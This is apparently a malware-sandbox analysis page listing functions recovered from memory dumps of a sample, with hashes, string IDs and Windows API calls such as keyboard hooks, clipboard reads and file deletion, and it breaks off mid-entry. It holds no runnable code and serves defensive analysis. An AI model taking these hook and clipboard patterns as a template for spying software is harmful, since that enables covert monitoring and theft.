Instruction ID: 3cc174e17fbb04af14d01e03bab529f4cd9624f0658f10a1a263d24881f1bab0
Opcode Fuzzy Hash: e9d1b059e0abba8288b2e2f1f930f51757da8443d3437765c287ea2c7235186c
Instruction Fuzzy Hash: 25E13C30E1030A8FDF65DF68D5846AEB7A6EB84304F20A529D40AAB354DF35EC46CB91

Function 06EBB728 Relevance: 8.0, Strings: 6, Instructions: 473COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EBBCE1
$^q, xrefs: 06EBBC85
$^q, xrefs: 06EBBC79
$^q, xrefs: 06EBBCAD
$^q, xrefs: 06EBBCED
$^q, xrefs: 06EBBCB9

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 829e287e7f247558979b44322948316c140b2292ea2e2dfa29cac48d15e335dc
Instruction ID: 59c135582d89f369cfb7cf160aa9800c7d1651b7ade890135ee2ffb2802141b4
Opcode Fuzzy Hash: 829e287e7f247558979b44322948316c140b2292ea2e2dfa29cac48d15e335dc
Instruction Fuzzy Hash: C2025B30E002098FDBA4DF68D9806AEB7B2FB85308F24A96AD405DB355DF35DC85CB91

Function 06EAA247 Relevance: 6.1, APIs: 4, Instructions: 149
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06EAA306
GetCurrentThread.KERNEL32 ref: 06EAA343
GetCurrentProcess.KERNEL32 ref: 06EAA380
GetCurrentThreadId.KERNEL32 ref: 06EAA3D9

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0ef6209604d9ffdf0dd6b80ecb63813b90017b7191d78d006734a93ff8e9f60c
Instruction ID: 2c9e973a18cf66d618b6f9109a1fde9a2a8975216227eced4287650317c7983e
Opcode Fuzzy Hash: 0ef6209604d9ffdf0dd6b80ecb63813b90017b7191d78d006734a93ff8e9f60c
Instruction Fuzzy Hash: 425167B0901349CFDB44DFAAD948BEEBBF1FF49304F24806AD049AB260D7356848CB65

Function 06EAA257 Relevance: 6.1, APIs: 4, Instructions: 142
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06EAA306
GetCurrentThread.KERNEL32 ref: 06EAA343
GetCurrentProcess.KERNEL32 ref: 06EAA380
GetCurrentThreadId.KERNEL32 ref: 06EAA3D9

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3c2c4604878f948ca9eef348a5973390fc9aedf0d2524bd5468702ddf9c2082b
Instruction ID: f726cf222c2e9f0edf65a2aca3543eabb324d78df5a33d5c70b9080a605b57a6
Opcode Fuzzy Hash: 3c2c4604878f948ca9eef348a5973390fc9aedf0d2524bd5468702ddf9c2082b
Instruction Fuzzy Hash: 635158B0901349CFDB54DFAAD948B9EBBF1FF49304F24806AD059AB360D7346848CB65

Function 06EAA26C Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06EAA306
GetCurrentThread.KERNEL32 ref: 06EAA343
GetCurrentProcess.KERNEL32 ref: 06EAA380
GetCurrentThreadId.KERNEL32 ref: 06EAA3D9

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 202ed5d4fc31c80e85b393e6a557eb5e423c3a2bd69164d2781ff62184a08d79
Instruction ID: cf03ed1c2fe54471ed258e16cee60f62180bdc770f2a222870c7e9c80daf31bb
Opcode Fuzzy Hash: 202ed5d4fc31c80e85b393e6a557eb5e423c3a2bd69164d2781ff62184a08d79
Instruction Fuzzy Hash: 3E5146B09003098FDB54DFAAD948B9EBBF1EF49304F24C06AD159AB260D7356948CB65

Function 06EAA279 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06EAA306
GetCurrentThread.KERNEL32 ref: 06EAA343
GetCurrentProcess.KERNEL32 ref: 06EAA380
GetCurrentThreadId.KERNEL32 ref: 06EAA3D9

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e321fd2f484749223955c0a79254a81acceab3990c79c825a20cbacf412ef905
Instruction ID: 93daf5019f3e079e5a72f78c73f42d6e6f2cd3cc9327ded4747532c237e5467e
Opcode Fuzzy Hash: e321fd2f484749223955c0a79254a81acceab3990c79c825a20cbacf412ef905
Instruction Fuzzy Hash: B95157B09003098FDB54DFAAD948B9EBBF1FF49304F24C069E149AB360D7356848CB65

Function 06EAA288 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06EAA306
GetCurrentThread.KERNEL32 ref: 06EAA343
GetCurrentProcess.KERNEL32 ref: 06EAA380
GetCurrentThreadId.KERNEL32 ref: 06EAA3D9

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 450f670842975064533266ea45b2f09c20b3cd5b543c8d1f121972112dcdc2ae
Instruction ID: 094525c4ac8466e482afac1200556e66c0000d0311e6335f2026331fd9ed4c7d
Opcode Fuzzy Hash: 450f670842975064533266ea45b2f09c20b3cd5b543c8d1f121972112dcdc2ae
Instruction Fuzzy Hash: 6B5136B09003098FDB54DFAAD948B9EBBF1EF48304F248469D159AB360D7356948CB65

Function 06EB9230 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06EB9283
$^q, xrefs: 06EB92B2
$^q, xrefs: 06EB92BE
$^q, xrefs: 06EB9277

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 1e30ef28ee1515fb727c92b062c72eedec9c886be973de4a3ea7cb72532a1730
Instruction ID: be5c0799cd717b3add63d66793bece88be09887638629bd726303636e1b58794
Opcode Fuzzy Hash: 1e30ef28ee1515fb727c92b062c72eedec9c886be973de4a3ea7cb72532a1730
Instruction Fuzzy Hash: 5E915D30F0021A9FDB54DB64D8907AFB3F6EF89304F109469C50AEB385EB749C468B95

Function 06EBD030 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06EBD427
$^q, xrefs: 06EBD43B
$^q, xrefs: 06EBD42F

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 0273da621371ceccf8f104d648be3e9789b2eb68d198aa8b597b9a7e8ddea93a
Instruction ID: 7f36c8b9f578fbebcca469666bc0e75e2a3ca9bbd09d7e4485b490dcac4e5025
Opcode Fuzzy Hash: 0273da621371ceccf8f104d648be3e9789b2eb68d198aa8b597b9a7e8ddea93a
Instruction Fuzzy Hash: D5623130B002069FCB55DB68D980AAEB7B6FF84304F14A969D0099F365DB76EC46CF85

Function 06EB4C70 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06EB4C9B
XPcq, xrefs: 06EB4DC1
\Ocq, xrefs: 06EB4E4B

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 666ebbafb16db00034afd1a04e239326d406b6cf193c34aec17570f10488af54
Instruction ID: 8fe4e0bf48b2dfec19e81c7dbf9ccc03dbb9b1969fe5deeeef4aa64c9952f2b3
Opcode Fuzzy Hash: 666ebbafb16db00034afd1a04e239326d406b6cf193c34aec17570f10488af54
Instruction Fuzzy Hash: F7616F70F002199FEB549FA8C8547AEBBF7FB88700F209429D106AB395DB758C45CB91

Function 06EB9220 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EB92B2
$^q, xrefs: 06EB9277

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 68f17a7df306f855193fd447753148c90cc99b2d11024709489bc94630ec4807
Instruction ID: 8732ee2c90cdccbf53a5408a5a4cfae2fb8da63aa41ca556cafbfb87f575356f
Opcode Fuzzy Hash: 68f17a7df306f855193fd447753148c90cc99b2d11024709489bc94630ec4807
Instruction Fuzzy Hash: D3515034B002059FDB54DB64E990BAF73FAEFC9744F10A46AC50ADB385DA34DC428B95

Function 06EB4C61 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

fcq, xrefs: 06EB4C9B
XPcq, xrefs: 06EB4DC1

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 5c07cd1382826f2aee88b33aa36f6ffc0442be455137172582c2f18c1226f32a
Instruction ID: 982916833e732c4b9f6dcedd2257ba6106c7173029862173bfd01ab56cb85bb2
Opcode Fuzzy Hash: 5c07cd1382826f2aee88b33aa36f6ffc0442be455137172582c2f18c1226f32a
Instruction Fuzzy Hash: 09515C70B002099BEB559FA9C854BAEBBE7FB88700F20C529D106AB395DA758C018B95

Function 0196EFB8 Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e876ad4a810ecc23620aa3d6a7dc562532fab01e47923979e8160e28de22ef7
Instruction ID: 03177469768ed2c354c7b17ac9f1631dcea041c08806be499e6df6efaf76e944
Opcode Fuzzy Hash: 1e876ad4a810ecc23620aa3d6a7dc562532fab01e47923979e8160e28de22ef7
Instruction Fuzzy Hash: 9B516571D043988FCB04CBB9D8102AABFF5EF8A310F1586AAD548D7391DB349845CBE1

Function 06EA6738 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06EA684A

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ed4a53b37c3fcad6338ad48a43620bc9c1bfdb630c11b39b01934551e683ef0b
Instruction ID: 401b1ff4f56cb7efed872afcaf1cb05bb1c2b7473a12690c44d2bb5215ecc07f
Opcode Fuzzy Hash: ed4a53b37c3fcad6338ad48a43620bc9c1bfdb630c11b39b01934551e683ef0b
Instruction Fuzzy Hash: AE41C0B1D103099FDB14CF9AC984ADEBBB5FF49314F24812AE819AB210D771A845CF90

Function 06EAB0E0 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06EAB839

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c839b3f9c59d29d527653cd483f435b00bc69edb803de76a1add51585e5451d7
Instruction ID: c9e6154764727aaa3190ddcc42dd95c58ba5505cb7e7c9f4bc2088cbc29b1ef9
Opcode Fuzzy Hash: c839b3f9c59d29d527653cd483f435b00bc69edb803de76a1add51585e5451d7
Instruction Fuzzy Hash: 65412BB8900349CFDB54CF99C888AAABBF5FF88314F24C459D519AB321D775A845CFA0

Function 06EAB480 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06EAC150

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 4c3bdf0770b8b4f8b70244557b7818dd858c75f5993437915584288a45c860a7
Instruction ID: 6c6dfc2ab7896f9ab7f9981474c13bf6647ea1186fe81111384de00ea9b3929d
Opcode Fuzzy Hash: 4c3bdf0770b8b4f8b70244557b7818dd858c75f5993437915584288a45c860a7
Instruction Fuzzy Hash: 8131F0B0E01348DFDB50CF99C984BDEBBF5AB48704F248059E408BB294D7B46849CF95

Function 06EAA4D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06EAA557

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 04efa38b2c695809393c064642dfc96ae561e7dfbe3c6eab011aa5e7781858ad
Instruction ID: e353064352ffff85fd173938893a58c4a56000caf246cfaa11d1be2c5e83b2c2
Opcode Fuzzy Hash: 04efa38b2c695809393c064642dfc96ae561e7dfbe3c6eab011aa5e7781858ad
Instruction Fuzzy Hash: A721E4B5900348DFDB10CF9AD984ADEBBF4EB48310F14845AE958A7310C375A944CFA4

Function 06EADE8B Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06EADF0B

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c47e961350ab33d7d6bda770b5c1f26d58aef53159fd7e9afdb3304c684998ee
Instruction ID: 86ba81d183bca5e66126e9cc8c65105ffc4ba4ef46d1a34893f1d2adff7e364e
Opcode Fuzzy Hash: c47e961350ab33d7d6bda770b5c1f26d58aef53159fd7e9afdb3304c684998ee
Instruction Fuzzy Hash: FB2135B5D002099FCB54DF99C844BEEFBF4EF88314F20842AE458A7250C775A944CFA5

Function 01968038 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 019680B0

Memory Dump Source

Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 75dbb8dc539cb2e83f502528abd58cafd81ec37bdd6115b3bc5d7f0fd9b987ad
Instruction ID: 6dbb906588b3aab9472919a8f3739ec503a1fe6abec5a2e7c8bd92a60f3bdc93
Opcode Fuzzy Hash: 75dbb8dc539cb2e83f502528abd58cafd81ec37bdd6115b3bc5d7f0fd9b987ad
Instruction Fuzzy Hash: F62147B1C0061A9BCB24CFAAC445BDEFBB8FF08320F108569D958A7240D734A940CFA5

Function 06EADE90 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06EADF0B

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c0afefcb60ebc22f7951eb84753412e80ea1de16416f6b31876514d73f0b56e6
Instruction ID: 69c9bbec576d968ef392f9a8400bd0d1c1b5751a487f33690252778016522da4
Opcode Fuzzy Hash: c0afefcb60ebc22f7951eb84753412e80ea1de16416f6b31876514d73f0b56e6
Instruction Fuzzy Hash: 322124B5D002099FCB14DF9AC844BEEFBF5EF88324F10842AE458A7250C775A944CFA5

Function 01968040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 019680B0

Memory Dump Source

Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3963589f4692ac3a5a90ec0179e0218a7f2c6c6264b603a99177b374f9e70c29
Instruction ID: 0ac6329fea34ee553ebda90f6af2d48c706276c2fbc1d84fa0ca9d5a13ebcc0e
Opcode Fuzzy Hash: 3963589f4692ac3a5a90ec0179e0218a7f2c6c6264b603a99177b374f9e70c29
Instruction Fuzzy Hash: 091124B1C006599BCB14CF9AC544BDEFBB8AB48320F10856AD958A7240D778A944CFA5

Function 0196F0A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0196F107

Memory Dump Source

Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 30fd72f9dcce6eddd3e7cbfff937b08b995796c2f0dc35d0bd87e9dddfe2bc3a
Instruction ID: 550f49db63f5dbefa889bd3ee6b7893284ec53fd329597f1ab925aceda76f41a
Opcode Fuzzy Hash: 30fd72f9dcce6eddd3e7cbfff937b08b995796c2f0dc35d0bd87e9dddfe2bc3a
Instruction Fuzzy Hash: B61112B1C00269DBCB10DF9AD544BDEFBF8BF48320F11816AD918A7244D778A944CFA5

Function 06EABF20 Relevance: 1.6, APIs: 1, Instructions: 51comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EABFD5

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 279358d1b88e0ebeeae5df002fa96b45bde895d0f473ad4c747175dd110c3564
Instruction ID: 258a1404a08b4972e5815582c80c5886c40ceba3e61e77c22deede55917c840f
Opcode Fuzzy Hash: 279358d1b88e0ebeeae5df002fa96b45bde895d0f473ad4c747175dd110c3564
Instruction Fuzzy Hash: 44115BB99043888FCB10CFA9D944BDEBFF4EF49324F24859AD568AB251C335A544CFA1

Function 06EA5688 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06EA56F6

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d24fc3fdc31b01fdc95c42a8452cc3bc898f3848175f40f0f63dd76413750c8f
Instruction ID: da18007139bed3d17a279e76165efb83123f3363410bbafd74eac71ac54a87a4
Opcode Fuzzy Hash: d24fc3fdc31b01fdc95c42a8452cc3bc898f3848175f40f0f63dd76413750c8f
Instruction Fuzzy Hash: 99112DB6C003489FDB10CF9AC848ADEFBF4AF88324F14846AD468BB600C375A545CFA1

Function 06EA3FB4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06EA56F6

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f5f4e3a8692d4a614448f9aa4324c6fbdbcc7c1aca0fc0181dfa4f0b0f423f4c
Instruction ID: 089d8913832c97bef3a64692fddac7c725cc7aaab1815b3dba7eec9bea76473b
Opcode Fuzzy Hash: f5f4e3a8692d4a614448f9aa4324c6fbdbcc7c1aca0fc0181dfa4f0b0f423f4c
Instruction Fuzzy Hash: 09111FB5C003488FDB10DF9AC448A9EFBF4AB88224F10846AD418BB200C375A544CFA5

Function 06EAB36C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EABFD5

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bc47607f9e134e75eff3c75cece5a43927ab4d9a5bb15c55da31ebc29226e3ba
Instruction ID: c373bc86db31e67ab2d31f1fb9897666c77a3622633d2ab00c078289af3d0248
Opcode Fuzzy Hash: bc47607f9e134e75eff3c75cece5a43927ab4d9a5bb15c55da31ebc29226e3ba
Instruction Fuzzy Hash: C51145B88003488FCB20DF9AC848BDEBBF4EB48324F248459D558B7310C375A944CFA5

Function 06EAB134 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06EABA8D), ref: 06EABB17

Memory Dump Source

Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a639025ac0372af7c41a75026d4b44da357e1920647d929af874e05d517b7b26
Instruction ID: 5b1dbba34032570086c31acfd294b6d925983781cae6bbd5b1ea1cfe09270c75
Opcode Fuzzy Hash: a639025ac0372af7c41a75026d4b44da357e1920647d929af874e05d517b7b26
Instruction Fuzzy Hash: 271133B1800348CFCB20DF9AD889BDEBBF4EB48324F20846AD558A7304C374A944CFA4

Function 06EBDBA5 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06EBDD01

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 7f4be2fbee33600c1dbd4bca39161ecd81c3d55fa11dd2d838dca3a9272a7c40
Instruction ID: 16fd370375bf822ac0be1a495a6486a1810fd9d27dbe63a15d96b8f15d83a9a1
Opcode Fuzzy Hash: 7f4be2fbee33600c1dbd4bca39161ecd81c3d55fa11dd2d838dca3a9272a7c40
Instruction Fuzzy Hash: B4419A30E0030A9FDB65DFA5D8446EFBBB2FF85204F246629E401EB240DBB19946CB91

Function 06EB21D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06EB2313

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 2afb88072c570919f8e2185df759b9a94460a2607716f67a97a28650d05f00cc
Instruction ID: 27cf7ada81bc018b7793771ed569747c5ab53c467193b164b2f70a66a4ef11cf
Opcode Fuzzy Hash: 2afb88072c570919f8e2185df759b9a94460a2607716f67a97a28650d05f00cc
Instruction Fuzzy Hash: 7931BE30B002028FDB559B74D9186BF7AE2EF89604F20A528D506DB384EE35DD46C7A6

Function 06EB4B59 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 06EB4B65

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
Opcode ID: 64fdff9bbe9d6079f0a4aba1b2a3e4ca926dfc99f06e2dff6e3405204949ed2f
Instruction ID: 89713967551d1253b556c9f38d4ec140f0c43975308eec189aaa64150b0091a6
Opcode Fuzzy Hash: 64fdff9bbe9d6079f0a4aba1b2a3e4ca926dfc99f06e2dff6e3405204949ed2f
Instruction Fuzzy Hash: 72F07A31A60219DBDB14DF94E899BAEBBB2FF84704F205119E502A72D9CB741D45CB81

Function 06EB62D8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55a0347e51b5527a2753cea49206741c983f76e3a5b01a3c6f41ed5d77093a8
Instruction ID: 061cc1546eec091f3165b983224966efd0666e172d71232bbe4a5793207a93ff
Opcode Fuzzy Hash: c55a0347e51b5527a2753cea49206741c983f76e3a5b01a3c6f41ed5d77093a8
Instruction Fuzzy Hash: 5761DF71F001114FDF509A7EC8886AFAADBAFC4624B25543AD80EDB364DE66DD0287C6

Function 06EB43A0 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
